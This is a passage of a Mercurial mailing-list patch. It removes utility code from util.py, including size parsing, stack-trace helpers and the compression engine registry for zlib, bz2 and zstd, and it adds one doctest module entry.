- (' ' * _timenesting[0], func.__name__,
- timecount(elapsed)))
- return wrapper
-
-_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
- ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
-
-def sizetoint(s):
- '''Convert a space specifier to a byte count.
-
- >>> sizetoint(b'30')
- 30
- >>> sizetoint(b'2.2kb')
- 2252
- >>> sizetoint(b'6M')
- 6291456
- '''
- t = s.strip().lower()
- try:
- for k, u in _sizeunits:
- if t.endswith(k):
- return int(float(t[:-len(k)]) * u)
- return int(t)
- except ValueError:
- raise error.ParseError(_("couldn't parse size: %s") % s)
-
-class hooks(object):
- '''A collection of hook functions that can be used to extend a
- function's behavior. Hooks are called in lexicographic order,
- based on the names of their sources.'''
-
- def __init__(self):
- self._hooks = []
-
- def add(self, source, hook):
- self._hooks.append((source, hook))
-
- def __call__(self, *args):
- self._hooks.sort(key=lambda x: x[0])
- results = []
- for source, hook in self._hooks:
- results.append(hook(*args))
- return results
-
-def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
- '''Yields lines for a nicely formatted stacktrace.
- Skips the 'skip' last entries, then return the last 'depth' entries.
- Each file+linenumber is formatted according to fileline.
- Each line is formatted according to line.
- If line is None, it yields:
- length of longest filepath+line number,
- filepath+linenumber,
- function
-
- Not be used in production code but very convenient while developing.
- '''
- entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
- for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
- ][-depth:]
- if entries:
- fnmax = max(len(entry[0]) for entry in entries)
- for fnln, func in entries:
- if line is None:
- yield (fnmax, fnln, func)
- else:
- yield line % (fnmax, fnln, func)
-
-def debugstacktrace(msg='stacktrace', skip=0,
- f=stderr, otherf=stdout, depth=0):
- '''Writes a message to f (stderr) with a nicely formatted stacktrace.
- Skips the 'skip' entries closest to the call, then show 'depth' entries.
- By default it will flush stdout first.
- It can be used everywhere and intentionally does not require an ui object.
- Not be used in production code but very convenient while developing.
- '''
- if otherf:
- otherf.flush()
- f.write('%s at:\n' % msg.rstrip())
- for line in getstackframes(skip + 1, depth=depth):
- f.write(line)
- f.flush()
-
-class dirs(object):
- '''a multiset of directory names from a dirstate or manifest'''
-
- def __init__(self, map, skip=None):
- self._dirs = {}
- addpath = self.addpath
- if safehasattr(map, 'iteritems') and skip is not None:
- for f, s in map.iteritems():
- if s[0] != skip:
- addpath(f)
- else:
- for f in map:
- addpath(f)
-
- def addpath(self, path):
- dirs = self._dirs
- for base in finddirs(path):
- if base in dirs:
- dirs[base] += 1
- return
- dirs[base] = 1
-
- def delpath(self, path):
- dirs = self._dirs
- for base in finddirs(path):
- if dirs[base] > 1:
- dirs[base] -= 1
- return
- del dirs[base]
-
- def __iter__(self):
- return iter(self._dirs)
-
- def __contains__(self, d):
- return d in self._dirs
-
-if safehasattr(parsers, 'dirs'):
- dirs = parsers.dirs
-
-def finddirs(path):
- pos = path.rfind('/')
- while pos != -1:
- yield path[:pos]
- pos = path.rfind('/', 0, pos)
-
-# compression code
-
-SERVERROLE = 'server'
-CLIENTROLE = 'client'
-
-compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
- (u'name', u'serverpriority',
- u'clientpriority'))
-
-class compressormanager(object):
- """Holds registrations of various compression engines.
-
- This class essentially abstracts the differences between compression
- engines to allow new compression formats to be added easily, possibly from
- extensions.
-
- Compressors are registered against the global instance by calling its
- ``register()`` method.
- """
- def __init__(self):
- self._engines = {}
- # Bundle spec human name to engine name.
- self._bundlenames = {}
- # Internal bundle identifier to engine name.
- self._bundletypes = {}
- # Revlog header to engine name.
- self._revlogheaders = {}
- # Wire proto identifier to engine name.
- self._wiretypes = {}
-
- def __getitem__(self, key):
- return self._engines[key]
-
- def __contains__(self, key):
- return key in self._engines
-
- def __iter__(self):
- return iter(self._engines.keys())
-
- def register(self, engine):
- """Register a compression engine with the manager.
-
- The argument must be a ``compressionengine`` instance.
- """
- if not isinstance(engine, compressionengine):
- raise ValueError(_('argument must be a compressionengine'))
-
- name = engine.name()
-
- if name in self._engines:
- raise error.Abort(_('compression engine %s already registered') %
- name)
-
- bundleinfo = engine.bundletype()
- if bundleinfo:
- bundlename, bundletype = bundleinfo
-
- if bundlename in self._bundlenames:
- raise error.Abort(_('bundle name %s already registered') %
- bundlename)
- if bundletype in self._bundletypes:
- raise error.Abort(_('bundle type %s already registered by %s') %
- (bundletype, self._bundletypes[bundletype]))
-
- # No external facing name declared.
- if bundlename:
- self._bundlenames[bundlename] = name
-
- self._bundletypes[bundletype] = name
-
- wiresupport = engine.wireprotosupport()
- if wiresupport:
- wiretype = wiresupport.name
- if wiretype in self._wiretypes:
- raise error.Abort(_('wire protocol compression %s already '
- 'registered by %s') %
- (wiretype, self._wiretypes[wiretype]))
-
- self._wiretypes[wiretype] = name
-
- revlogheader = engine.revlogheader()
- if revlogheader and revlogheader in self._revlogheaders:
- raise error.Abort(_('revlog header %s already registered by %s') %
- (revlogheader, self._revlogheaders[revlogheader]))
-
- if revlogheader:
- self._revlogheaders[revlogheader] = name
-
- self._engines[name] = engine
-
- @property
- def supportedbundlenames(self):
- return set(self._bundlenames.keys())
-
- @property
- def supportedbundletypes(self):
- return set(self._bundletypes.keys())
-
- def forbundlename(self, bundlename):
- """Obtain a compression engine registered to a bundle name.
-
- Will raise KeyError if the bundle type isn't registered.
-
- Will abort if the engine is known but not available.
- """
- engine = self._engines[self._bundlenames[bundlename]]
- if not engine.available():
- raise error.Abort(_('compression engine %s could not be loaded') %
- engine.name())
- return engine
-
- def forbundletype(self, bundletype):
- """Obtain a compression engine registered to a bundle type.
-
- Will raise KeyError if the bundle type isn't registered.
-
- Will abort if the engine is known but not available.
- """
- engine = self._engines[self._bundletypes[bundletype]]
- if not engine.available():
- raise error.Abort(_('compression engine %s could not be loaded') %
- engine.name())
- return engine
-
- def supportedwireengines(self, role, onlyavailable=True):
- """Obtain compression engines that support the wire protocol.
-
- Returns a list of engines in prioritized order, most desired first.
-
- If ``onlyavailable`` is set, filter out engines that can't be
- loaded.
- """
- assert role in (SERVERROLE, CLIENTROLE)
-
- attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
-
- engines = [self._engines[e] for e in self._wiretypes.values()]
- if onlyavailable:
- engines = [e for e in engines if e.available()]
-
- def getkey(e):
- # Sort first by priority, highest first. In case of tie, sort
- # alphabetically. This is arbitrary, but ensures output is
- # stable.
- w = e.wireprotosupport()
- return -1 * getattr(w, attr), w.name
-
- return list(sorted(engines, key=getkey))
-
- def forwiretype(self, wiretype):
- engine = self._engines[self._wiretypes[wiretype]]
- if not engine.available():
- raise error.Abort(_('compression engine %s could not be loaded') %
- engine.name())
- return engine
-
- def forrevlogheader(self, header):
- """Obtain a compression engine registered to a revlog header.
-
- Will raise KeyError if the revlog header value isn't registered.
- """
- return self._engines[self._revlogheaders[header]]
-
-compengines = compressormanager()
-
-class compressionengine(object):
- """Base class for compression engines.
-
- Compression engines must implement the interface defined by this class.
- """
- def name(self):
- """Returns the name of the compression engine.
-
- This is the key the engine is registered under.
-
- This method must be implemented.
- """
- raise NotImplementedError()
-
- def available(self):
- """Whether the compression engine is available.
-
- The intent of this method is to allow optional compression engines
- that may not be available in all installations (such as engines relying
- on C extensions that may not be present).
- """
- return True
-
- def bundletype(self):
- """Describes bundle identifiers for this engine.
-
- If this compression engine isn't supported for bundles, returns None.
-
- If this engine can be used for bundles, returns a 2-tuple of strings of
- the user-facing "bundle spec" compression name and an internal
- identifier used to denote the compression format within bundles. To
- exclude the name from external usage, set the first element to ``None``.
-
- If bundle compression is supported, the class must also implement
- ``compressstream`` and `decompressorreader``.
-
- The docstring of this method is used in the help system to tell users
- about this engine.
- """
- return None
-
- def wireprotosupport(self):
- """Declare support for this compression format on the wire protocol.
-
- If this compression engine isn't supported for compressing wire
- protocol payloads, returns None.
-
- Otherwise, returns ``compenginewireprotosupport`` with the following
- fields:
-
- * String format identifier
- * Integer priority for the server
- * Integer priority for the client
-
- The integer priorities are used to order the advertisement of format
- support by server and client. The highest integer is advertised
- first. Integers with non-positive values aren't advertised.
-
- The priority values are somewhat arbitrary and only used for default
- ordering. The relative order can be changed via config options.
-
- If wire protocol compression is supported, the class must also implement
- ``compressstream`` and ``decompressorreader``.
- """
- return None
-
- def revlogheader(self):
- """Header added to revlog chunks that identifies this engine.
-
- If this engine can be used to compress revlogs, this method should
- return the bytes used to identify chunks compressed with this engine.
- Else, the method should return ``None`` to indicate it does not
- participate in revlog compression.
- """
- return None
-
- def compressstream(self, it, opts=None):
- """Compress an iterator of chunks.
-
- The method receives an iterator (ideally a generator) of chunks of
- bytes to be compressed. It returns an iterator (ideally a generator)
- of bytes of chunks representing the compressed output.
-
- Optionally accepts an argument defining how to perform compression.
- Each engine treats this argument differently.
- """
- raise NotImplementedError()
-
- def decompressorreader(self, fh):
- """Perform decompression on a file object.
-
- Argument is an object with a ``read(size)`` method that returns
- compressed data. Return value is an object with a ``read(size)`` that
- returns uncompressed data.
- """
- raise NotImplementedError()
-
- def revlogcompressor(self, opts=None):
- """Obtain an object that can be used to compress revlog entries.
-
- The object has a ``compress(data)`` method that compresses binary
- data. This method returns compressed binary data or ``None`` if
- the data could not be compressed (too small, not compressible, etc).
- The returned data should have a header uniquely identifying this
- compression format so decompression can be routed to this engine.
- This header should be identified by the ``revlogheader()`` return
- value.
-
- The object has a ``decompress(data)`` method that decompresses
- data. The method will only be called if ``data`` begins with
- ``revlogheader()``. The method should return the raw, uncompressed
- data or raise a ``RevlogError``.
-
- The object is reusable but is not thread safe.
- """
- raise NotImplementedError()
-
-class _zlibengine(compressionengine):
- def name(self):
- return 'zlib'
-
- def bundletype(self):
- """zlib compression using the DEFLATE algorithm.
-
- All Mercurial clients should support this format. The compression
- algorithm strikes a reasonable balance between compression ratio
- and size.
- """
- return 'gzip', 'GZ'
-
- def wireprotosupport(self):
- return compewireprotosupport('zlib', 20, 20)
-
- def revlogheader(self):
- return 'x'
-
- def compressstream(self, it, opts=None):
- opts = opts or {}
-
- z = zlib.compressobj(opts.get('level', -1))
- for chunk in it:
- data = z.compress(chunk)
- # Not all calls to compress emit data. It is cheaper to inspect
- # here than to feed empty chunks through generator.
- if data:
- yield data
-
- yield z.flush()
-
- def decompressorreader(self, fh):
- def gen():
- d = zlib.decompressobj()
- for chunk in filechunkiter(fh):
- while chunk:
- # Limit output size to limit memory.
- yield d.decompress(chunk, 2 ** 18)
- chunk = d.unconsumed_tail
-
- return chunkbuffer(gen())
-
- class zlibrevlogcompressor(object):
- def compress(self, data):
- insize = len(data)
- # Caller handles empty input case.
- assert insize > 0
-
- if insize < 44:
- return None
-
- elif insize <= 1000000:
- compressed = zlib.compress(data)
- if len(compressed) < insize:
- return compressed
- return None
-
- # zlib makes an internal copy of the input buffer, doubling
- # memory usage for large inputs. So do streaming compression
- # on large inputs.
- else:
- z = zlib.compressobj()
- parts = []
- pos = 0
- while pos < insize:
- pos2 = pos + 2**20
- parts.append(z.compress(data[pos:pos2]))
- pos = pos2
- parts.append(z.flush())
-
- if sum(map(len, parts)) < insize:
- return ''.join(parts)
- return None
-
- def decompress(self, data):
- try:
- return zlib.decompress(data)
- except zlib.error as e:
- raise error.RevlogError(_('revlog decompress error: %s') %
- forcebytestr(e))
-
- def revlogcompressor(self, opts=None):
- return self.zlibrevlogcompressor()
-
-compengines.register(_zlibengine())
-
-class _bz2engine(compressionengine):
- def name(self):
- return 'bz2'
-
- def bundletype(self):
- """An algorithm that produces smaller bundles than ``gzip``.
-
- All Mercurial clients should support this format.
-
- This engine will likely produce smaller bundles than ``gzip`` but
- will be significantly slower, both during compression and
- decompression.
-
- If available, the ``zstd`` engine can yield similar or better
- compression at much higher speeds.
- """
- return 'bzip2', 'BZ'
-
- # We declare a protocol name but don't advertise by default because
- # it is slow.
- def wireprotosupport(self):
- return compewireprotosupport('bzip2', 0, 0)
-
- def compressstream(self, it, opts=None):
- opts = opts or {}
- z = bz2.BZ2Compressor(opts.get('level', 9))
- for chunk in it:
- data = z.compress(chunk)
- if data:
- yield data
-
- yield z.flush()
-
- def decompressorreader(self, fh):
- def gen():
- d = bz2.BZ2Decompressor()
- for chunk in filechunkiter(fh):
- yield d.decompress(chunk)
-
- return chunkbuffer(gen())
-
-compengines.register(_bz2engine())
-
-class _truncatedbz2engine(compressionengine):
- def name(self):
- return 'bz2truncated'
-
- def bundletype(self):
- return None, '_truncatedBZ'
-
- # We don't implement compressstream because it is hackily handled elsewhere.
-
- def decompressorreader(self, fh):
- def gen():
- # The input stream doesn't have the 'BZ' header. So add it back.
- d = bz2.BZ2Decompressor()
- d.decompress('BZ')
- for chunk in filechunkiter(fh):
- yield d.decompress(chunk)
-
- return chunkbuffer(gen())
-
-compengines.register(_truncatedbz2engine())
-
-class _noopengine(compressionengine):
- def name(self):
- return 'none'
-
- def bundletype(self):
- """No compression is performed.
-
- Use this compression engine to explicitly disable compression.
- """
- return 'none', 'UN'
-
- # Clients always support uncompressed payloads. Servers don't because
- # unless you are on a fast network, uncompressed payloads can easily
- # saturate your network pipe.
- def wireprotosupport(self):
- return compewireprotosupport('none', 0, 10)
-
- # We don't implement revlogheader because it is handled specially
- # in the revlog class.
-
- def compressstream(self, it, opts=None):
- return it
-
- def decompressorreader(self, fh):
- return fh
-
- class nooprevlogcompressor(object):
- def compress(self, data):
- return None
-
- def revlogcompressor(self, opts=None):
- return self.nooprevlogcompressor()
-
-compengines.register(_noopengine())
-
-class _zstdengine(compressionengine):
- def name(self):
- return 'zstd'
-
- @propertycache
- def _module(self):
- # Not all installs have the zstd module available. So defer importing
- # until first access.
- try:
- from . import zstd
- # Force delayed import.
- zstd.__version__
- return zstd
- except ImportError:
- return None
-
- def available(self):
- return bool(self._module)
-
- def bundletype(self):
- """A modern compression algorithm that is fast and highly flexible.
-
- Only supported by Mercurial 4.1 and newer clients.
-
- With the default settings, zstd compression is both faster and yields
- better compression than ``gzip``. It also frequently yields better
- compression than ``bzip2`` while operating at much higher speeds.
-
- If this engine is available and backwards compatibility is not a
- concern, it is likely the best available engine.
- """
- return 'zstd', 'ZS'
-
- def wireprotosupport(self):
- return compewireprotosupport('zstd', 50, 50)
-
- def revlogheader(self):
- return '\x28'
-
- def compressstream(self, it, opts=None):
- opts = opts or {}
- # zstd level 3 is almost always significantly faster than zlib
- # while providing no worse compression. It strikes a good balance
- # between speed and compression.
- level = opts.get('level', 3)
-
- zstd = self._module
- z = zstd.ZstdCompressor(level=level).compressobj()
- for chunk in it:
- data = z.compress(chunk)
- if data:
- yield data
-
- yield z.flush()
-
- def decompressorreader(self, fh):
- zstd = self._module
- dctx = zstd.ZstdDecompressor()
- return chunkbuffer(dctx.read_from(fh))
-
- class zstdrevlogcompressor(object):
- def __init__(self, zstd, level=3):
- # Writing the content size adds a few bytes to the output. However,
- # it allows decompression to be more optimal since we can
- # pre-allocate a buffer to hold the result.
- self._cctx = zstd.ZstdCompressor(level=level,
- write_content_size=True)
- self._dctx = zstd.ZstdDecompressor()
- self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
- self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
-
- def compress(self, data):
- insize = len(data)
- # Caller handles empty input case.
- assert insize > 0
-
- if insize < 50:
- return None
-
- elif insize <= 1000000:
- compressed = self._cctx.compress(data)
- if len(compressed) < insize:
- return compressed
- return None
- else:
- z = self._cctx.compressobj()
- chunks = []
- pos = 0
- while pos < insize:
- pos2 = pos + self._compinsize
- chunk = z.compress(data[pos:pos2])
- if chunk:
- chunks.append(chunk)
- pos = pos2
- chunks.append(z.flush())
-
- if sum(map(len, chunks)) < insize:
- return ''.join(chunks)
- return None
-
- def decompress(self, data):
- insize = len(data)
-
- try:
- # This was measured to be faster than other streaming
- # decompressors.
- dobj = self._dctx.decompressobj()
- chunks = []
- pos = 0
- while pos < insize:
- pos2 = pos + self._decompinsize
- chunk = dobj.decompress(data[pos:pos2])
- if chunk:
- chunks.append(chunk)
- pos = pos2
- # Frame should be exhausted, so no finish() API.
-
- return ''.join(chunks)
- except Exception as e:
- raise error.RevlogError(_('revlog decompress error: %s') %
- forcebytestr(e))
-
- def revlogcompressor(self, opts=None):
- opts = opts or {}
- return self.zstdrevlogcompressor(self._module,
- level=opts.get('level', 3))
-
-compengines.register(_zstdengine())
-
-def bundlecompressiontopics():
- """Obtains a list of available bundle compressions for use in help."""
- # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
- items = {}
-
- # We need to format the docstring. So use a dummy object/type to hold it
- # rather than mutating the original.
- class docobject(object):
- pass
-
- for name in compengines:
- engine = compengines[name]
-
- if not engine.available():
- continue
-
- bt = engine.bundletype()
- if not bt or not bt[0]:
- continue
-
- doc = pycompat.sysstr('``%s``\n %s') % (
- bt[0], engine.bundletype.__doc__)
-
- value = docobject()
- value.__doc__ = doc
- value._origdoc = engine.bundletype.__doc__
- value._origfunc = engine.bundletype
-
- items[bt[0]] = value
-
- return items
-
-i18nfunctions = bundlecompressiontopics().values()
-
-# convenient shortcut
-dst = debugstacktrace
-
-def safename(f, tag, ctx, others=None):
- """
- Generate a name that it is safe to rename f to in the given context.
-
- f: filename to rename
- tag: a string tag that will be included in the new name
- ctx: a context, in which the new name must not exist
- others: a set of other filenames that the new name must not be in
-
- Returns a file name of the form oldname~tag[~number] which does not exist
- in the provided context and is not in the set of other names.
- """
- if others is None:
- others = set()
-
- fn = '%s~%s' % (f, tag)
- if fn not in ctx and fn not in others:
- return fn
- for n in itertools.count(1):
- fn = '%s~%s~%s' % (f, tag, n)
- if fn not in ctx and fn not in others:
- return fn
-
-def readexactly(stream, n):
- '''read n bytes from stream.read and abort if less was available'''
- s = stream.read(n)
- if len(s) < n:
- raise error.Abort(_("stream ended unexpectedly"
- " (got %d bytes, expected %d)")
- % (len(s), n))
- return s
-
-def uvarintencode(value):
- """Encode an unsigned integer value to a varint.
-
- A varint is a variable length integer of 1 or more bytes. Each byte
- except the last has the most significant bit set. The lower 7 bits of
- each byte store the 2's complement representation, least significant group
- first.
-
- >>> uvarintencode(0)
- '\\x00'
- >>> uvarintencode(1)
- '\\x01'
- >>> uvarintencode(127)
- '\\x7f'
- >>> uvarintencode(1337)
- '\\xb9\\n'
- >>> uvarintencode(65536)
- '\\x80\\x80\\x04'
- >>> uvarintencode(-1)
- Traceback (most recent call last):
- ...
- ProgrammingError: negative value for uvarint: -1
- """
- if value < 0:
- raise error.ProgrammingError('negative value for uvarint: %d'
- % value)
- bits = value & 0x7f
- value >>= 7
- bytes = []
- while value:
- bytes.append(pycompat.bytechr(0x80 | bits))
- bits = value & 0x7f
- value >>= 7
- bytes.append(pycompat.bytechr(bits))
-
- return ''.join(bytes)
-
-def uvarintdecodestream(fh):
- """Decode an unsigned variable length integer from a stream.
-
- The passed argument is anything that has a ``.read(N)`` method.
-
- >>> try:
- ... from StringIO import StringIO as BytesIO
- ... except ImportError:
- ... from io import BytesIO
- >>> uvarintdecodestream(BytesIO(b'\\x00'))
- 0
- >>> uvarintdecodestream(BytesIO(b'\\x01'))
- 1
- >>> uvarintdecodestream(BytesIO(b'\\x7f'))
- 127
- >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
- 1337
- >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
- 65536
- >>> uvarintdecodestream(BytesIO(b'\\x80'))
- Traceback (most recent call last):
- ...
- Abort: stream ended unexpectedly (got 0 bytes, expected 1)
- """
- result = 0
- shift = 0
- while True:
- byte = ord(readexactly(fh, 1))
- result |= ((byte & 0x7f) << shift)
- if not (byte & 0x80):
- return result
- shift += 7
-
-###
-# Deprecation warnings for util.py splitting
-###
-
-def _deprecatedfunc(func, version):
- def wrapped(*args, **kwargs):
- fn = pycompat.sysbytes(func.__name__)
- mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
- msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
- nouideprecwarn(msg, version)
- return func(*args, **kwargs)
- wrapped.__name__ = func.__name__
- return wrapped
-
-defaultdateformats = dateutil.defaultdateformats
-extendeddateformats = dateutil.extendeddateformats
-makedate = _deprecatedfunc(dateutil.makedate, '4.6')
-datestr = _deprecatedfunc(dateutil.datestr, '4.6')
-shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
-parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
-strdate = _deprecatedfunc(dateutil.strdate, '4.6')
-parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
-matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
diff --git a/tests/test-doctest.py b/tests/test-doctest.py
--- a/tests/test-doctest.py
+++ b/tests/test-doctest.py
@@ -70,6 +70,7 @@ testmod('mercurial.ui')
testmod('mercurial.url')
testmod('mercurial.util')
testmod('mercurial.util', testtarget='platform')
+testmod('mercurial.utils.stringutil')
testmod('hgext.convert.convcmd')
testmod('hgext.convert.cvsps')
testmod('hgext.convert.filemap')
More information about the Mercurial-devel
mailing list